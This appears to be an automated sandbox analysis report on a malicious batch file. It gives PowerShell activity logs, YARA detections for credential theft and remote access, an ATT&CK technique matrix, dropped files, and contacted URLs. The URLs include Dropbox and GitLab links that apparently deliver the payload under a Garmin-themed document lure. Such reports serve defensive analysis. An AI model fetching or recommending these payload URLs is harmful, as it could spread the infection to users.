                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: amsi64_6164.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6164, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: amsi64_6164.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6164, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                11
                Scripting
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                21
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                garsukhjdf11.bat6%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\Public\Document\Scripts\normalizer.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip3.12.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip3.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pywin32_postinstall.py0%ReversingLabs
                C:\Users\Public\Document\Scripts\pywin32_testall.py0%ReversingLabs
                C:\Users\Public\Document\Scripts\wsdump.exe0%ReversingLabs
                C:\Users\Public\Document\tcl\dde1.4\tcldde14.dll0%ReversingLabs
                C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exe0%ReversingLabs
                C:\Users\Public\Document\tcl\reg1.3\tclreg13.dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com/cd/0/get/CgGuX16-G6p7Fe4NIKQ0zfuqQ5PK0%Avira URL Cloudsafe
                https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                http://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                https://mhammond.github.io/pywin32_installers.html0%Avira URL Cloudsafe
                https://core.tcl-lang.org/tips/doc/main/tip/477.md)0%Avira URL Cloudsafe
                https://mhammond.github.io/pywin32_installers.html)10%Avira URL Cloudsafe
                https://mhammond.github.io/pywin32_installers.htmlz?Please0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                gitlab.com
                172.65.251.78
                truefalse
                  high
                  www-env.dropbox-dns.com
                  162.125.69.18
                  truefalse
                    high
                    uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com
                    unknown
                    unknownfalse
                      unknown
                      www.dropbox.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1false
                          high
                          https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zipfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://gitlab.compowershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.dropbox.com/service_worker.jspowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com/cd/0/get/CgGuX16-G6p7Fe4NIKQ0zfuqQ5PKpowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://go.microsoft.copowershell.exe, 0000000E.00000002.3301955351.000002C724C4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://paper.dropbox.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.hellofax.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://pal-test.adyen.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.dropbox.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://mhammond.github.io/pywin32_installers.html)1powershell.exe, 00000011.00000002.3326115686.00000223015CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://app.hellosign.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.hellosign.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.dropbox.com/scl/fi/4p5pc2fbhxx70qpowershell.exe, 0000000C.00000002.2169790015.0000028C26960000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://gitlab.compowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E21F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70DD77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.dropbox.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://photos.dropbox.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://a.sprig.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.docsend.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://gitlab.com/assets/powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contoso.com/powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2166323032.0000028C1E69F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2166323032.0000028C1E7E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CDB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://apis.google.compowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.docpowershell.exe, 0000000C.00000002.2169706025.0000028C267D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://mhammond.github.io/pywin32_installers.htmlpowershell.exe, 00000011.00000002.3326115686.0000022300F38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://mhammond.github.io/pywin32_installers.htmlz?Pleasepowershell.exe, 00000011.00000002.3326115686.00000223015CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2154119672.0000028C0E631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70CC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.0000022300023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://login.yahoo.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://docsend.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.recaptcha.net/powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2166323032.0000028C1E69F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2166323032.0000028C1E7E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CDB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.dropbox.compowershell.exe, 0000000C.00000002.2154119672.0000028C0F263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connectionpowershell.exe, 00000011.00000002.3326115686.00000223017C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://go.micropowershell.exe, 0000000C.00000002.2154119672.0000028C0F263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70DD77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.0000022300538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contoso.com/Iconpowershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://core.tcl-lang.org/tips/doc/main/tip/477.md)powershell.exe, 00000011.00000002.3326115686.00000223016CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.00000223016E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.00000223016BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.000002230169A000.00000004.00000800.00020000.00000000.sdmp, targets.vc.17.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://help.dropbox.com/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
